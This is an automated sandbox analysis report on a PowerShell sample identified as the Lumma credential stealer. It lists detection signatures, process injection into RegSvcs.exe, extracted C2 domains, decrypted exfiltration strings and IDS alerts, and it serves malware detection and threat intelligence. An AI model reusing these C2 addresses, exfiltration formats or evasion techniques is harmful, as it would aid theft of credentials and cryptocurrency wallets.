Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
62.122.184.98 (3).ps1

Overview

General Information

Sample name:62.122.184.98 (3).ps1
Analysis ID:1591131
MD5:2b60655a425eaa036531f18e96741444
SHA1:ffa85842df96dac9f6dac782cb1081251eaac749
SHA256:930a09e6ee090e9f2b67e1a37270b4c31e3cb4fdad55cd8db34b11519759f145
Tags:62-122-184-98ps1user-JAMESWT_MHT
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 7364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (3).ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7904 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7912 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["nuttyshopr.biz", "truculengisau.biz", "punishzement.biz", "marketlumpe.biz", "spookycappy.biz", "fraggielek.biz", "grandiouseziu.biz", "littlenotii.biz"], "Build id": "DUkgLv--PISYA"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (3).ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (3).ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (3).ps1", ProcessId: 7364, ProcessName: powershell.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (3).ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (3).ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (3).ps1", ProcessId: 7364, ProcessName: powershell.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:10.624646+010020283713Unknown Traffic192.168.2.1049704104.102.49.254443TCP
        2025-01-14T18:01:12.372040+010020283713Unknown Traffic192.168.2.1049711188.114.97.3443TCP
        2025-01-14T18:01:13.594418+010020283713Unknown Traffic192.168.2.1049717188.114.97.3443TCP
        2025-01-14T18:01:14.833090+010020283713Unknown Traffic192.168.2.1049728188.114.97.3443TCP
        2025-01-14T18:01:16.415374+010020283713Unknown Traffic192.168.2.1049737188.114.97.3443TCP
        2025-01-14T18:01:17.485915+010020283713Unknown Traffic192.168.2.1049745188.114.97.3443TCP
        2025-01-14T18:01:18.529051+010020283713Unknown Traffic192.168.2.1049751188.114.97.3443TCP
        2025-01-14T18:01:19.821171+010020283713Unknown Traffic192.168.2.1049761188.114.97.3443TCP
        2025-01-14T18:01:23.192598+010020283713Unknown Traffic192.168.2.1049782188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:13.123944+010020546531A Network Trojan was detected192.168.2.1049711188.114.97.3443TCP
        2025-01-14T18:01:14.083227+010020546531A Network Trojan was detected192.168.2.1049717188.114.97.3443TCP
        2025-01-14T18:01:23.963228+010020546531A Network Trojan was detected192.168.2.1049782188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:13.123944+010020498361A Network Trojan was detected192.168.2.1049711188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:14.083227+010020498121A Network Trojan was detected192.168.2.1049717188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:09.877880+010020591331Domain Observed Used for C2 Detected192.168.2.10648281.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:09.890771+010020591351Domain Observed Used for C2 Detected192.168.2.10576371.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:09.868069+010020591371Domain Observed Used for C2 Detected192.168.2.10541961.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:09.903271+010020591411Domain Observed Used for C2 Detected192.168.2.10573331.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:09.914056+010020591431Domain Observed Used for C2 Detected192.168.2.10542531.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:09.924697+010020591451Domain Observed Used for C2 Detected192.168.2.10573891.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:09.936322+010020591511Domain Observed Used for C2 Detected192.168.2.10629551.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:09.947255+010020591531Domain Observed Used for C2 Detected192.168.2.10640101.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:18.991769+010020480941Malware Command and Control Activity Detected192.168.2.1049751188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:19.827392+010028438641A Network Trojan was detected192.168.2.1049761188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-14T18:01:11.784193+010028586661Domain Observed Used for C2 Detected192.168.2.1049704104.102.49.254443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://punishzement.biz:443/apim8Avira URL Cloud: Label: malware
        Source: https://aleksandr-block.com/apiAvira URL Cloud: Label: malware
        Source: https://aleksandr-block.com:443/apiAvira URL Cloud: Label: malware
        Source: https://grandiouseziu.biz:443/apiAvira URL Cloud: Label: malware
        Source: 10.2.RegSvcs.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["nuttyshopr.biz", "truculengisau.biz", "punishzement.biz", "marketlumpe.biz", "spookycappy.biz", "fraggielek.biz", "grandiouseziu.biz", "littlenotii.biz"], "Build id": "DUkgLv--PISYA"}
        Source: 62.122.184.98 (3).ps1ReversingLabs: Detection: 15%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: truculengisau.biz
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: spookycappy.biz
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: punishzement.biz
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nuttyshopr.biz
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: marketlumpe.biz
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: littlenotii.biz
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grandiouseziu.biz
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fraggielek.biz
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: littlenotii.biz
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: 0000000A.00000002.1441248201.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: DUkgLv--PISYA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00414E18 CryptUnprotectData,10_2_00414E18
        Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49717 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49745 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49751 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49761 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49782 version: TLS 1.2
        Source: Binary string: #.dll.pdb source: powershell.exe, 00000001.00000002.1302987160.000001E09F368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1333650674.000001E0B7520000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1302987160.000001E0A0423000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-13425C5Bh]10_2_0040BA1B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-66B4894Dh]10_2_0043FB02
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00420B20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea ecx, dword ptr [ebx+61h]10_2_00427B30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+0Ch]10_2_0043E560
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+46h]10_2_0043B500
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi-2C9D65B2h]10_2_0043B500
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00414E18
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov edx, ecx10_2_0040AEC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h10_2_00441EC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 27BE92A4h10_2_00441EC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+5BCA793Fh]10_2_004097E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax10_2_004097E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [edi], ax10_2_004097E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esi, edx10_2_00425870
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h10_2_00419000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [esi], bl10_2_0042E815
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax10_2_0041A0E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ebx, eax10_2_0041A0E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+67497F4Bh]10_2_0042D8F5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax10_2_0042D8F5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax10_2_0042D890
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, ebx10_2_004298A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push ebp10_2_0043C0A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edx], al10_2_0042F0BD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movsx eax, byte ptr [ebx+ebp]10_2_00441940
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax10_2_0042D859
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [esi], bl10_2_0042E961
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [esi], bl10_2_0042E96A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+232F41D2h]10_2_0044011F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edx], al10_2_0042F12D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edx], al10_2_0042F1D9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [esi], al10_2_0042E25A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-384D2D2Eh]10_2_00416258
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+12A137B5h]10_2_0043B210
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+3ED853ECh]10_2_00416A39
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h10_2_0042CAD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h10_2_0043EAD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, word ptr [esi]10_2_004412D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esp], CF132E6Eh10_2_004412D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebp, byte ptr [esp+eax-02h]10_2_004412D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp ecx10_2_004412D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+00000170h]10_2_0042D2E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [ebx], dl10_2_0042D2E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h10_2_00428AF7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+7998D126h]10_2_00421A80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h10_2_00421A80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00417AB2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 03D746FEh10_2_0043EB40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+08h]10_2_00442320
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esp], CF132E6Eh10_2_004413C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebp, byte ptr [esp+eax-02h]10_2_004413C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp ecx10_2_004413C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]10_2_0042B3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esp], CF132E6Eh10_2_004413D7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebp, byte ptr [esp+eax-02h]10_2_004413D7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp ecx10_2_004413D7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esp], CF132E6Eh10_2_004413D9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebp, byte ptr [esp+eax-02h]10_2_004413D9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp ecx10_2_004413D9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+66218682h]10_2_00409390
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx]10_2_00424C50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov edx, eax10_2_0040A416
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esp], CF132E6Eh10_2_004414C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebp, byte ptr [esp+eax-02h]10_2_004414C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp ecx10_2_004414C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [edi], cx10_2_00429CD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then test esi, esi10_2_0043C480
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [eax], cx10_2_00413C90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 3F2C504Eh10_2_00413C90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp eax10_2_00429CB7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea ecx, dword ptr [eax-4BEC4700h]10_2_00421550
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 3F2C504Eh10_2_00414559
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esp], CF132E6Eh10_2_00441560
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebp, byte ptr [esp+eax-02h]10_2_00441560
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp ecx10_2_00441560
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h10_2_00420534
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+43A84140h]10_2_0042F5CA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h10_2_0041ADE2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [edi], cx10_2_0041ADE2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esp+3Ch], F6F1F033h10_2_0043FDE4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esi, eax10_2_0043FDE4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]10_2_004075F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]10_2_004075F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esp], CF132E6Eh10_2_004415F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebp, byte ptr [esp+eax-02h]10_2_004415F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp ecx10_2_004415F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp al, 2Eh10_2_00427E50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [edx]10_2_00438600
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov eax, ebx10_2_0041C620
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp al, 2Eh10_2_00427E30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+24h]10_2_00427E30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]10_2_0041E750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx]10_2_0043CF68
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push edi10_2_0040BF73
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+51047AABh]10_2_00414710
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-180897B1h]10_2_0043E7C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]10_2_0041A7C6

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2059141 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marketlumpe .biz) : 192.168.2.10:57333 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2059151 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spookycappy .biz) : 192.168.2.10:62955 -> 1.1.1.1:53
